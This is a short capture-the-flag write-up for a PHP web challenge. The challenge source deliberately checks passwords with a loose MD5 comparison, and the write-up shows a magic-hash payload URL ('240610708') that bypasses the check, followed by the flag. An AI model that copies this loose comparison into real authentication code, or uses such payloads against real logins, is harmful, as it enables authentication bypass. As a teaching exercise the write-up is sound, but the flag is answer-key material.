# NISRA - MD5_1 ###### tags: `NISRA` `CTF` `Web` Challenge: [MD5_1](http://chall2.nisra.net:41022/) ## Source code ```php= <?php highlight_file(__FILE__); $FROM_INCLUDE = true; include("flag.php"); $msg = ""; if (isset($_GET['user']) && isset($_GET['password'])) { $user = $_GET['user']; $password = $_GET['password']; $check = "QNKCDZO"; // the md5 of "QNKCDZO" is 0e830400451993494058024219903391 if ($user == "admin" && $password != $check && md5($password) == md5($check)) { $msg = "Flag: ".$flag; } else { $msg = "Keep trying!"; } } echo $msg; ?> ``` ## Exploit - MD5 Collision Payload: `http://chall2.nisra.net:41022/?user=admin&password=240610708` :::spoiler flag `Flag: NISRA{PhP_is_th3_BeST_laNgUA9E}` ::: ## Reference [md5('240610708') == md5('QNKCDZO')](https://news.ycombinator.com/item?id=9484757)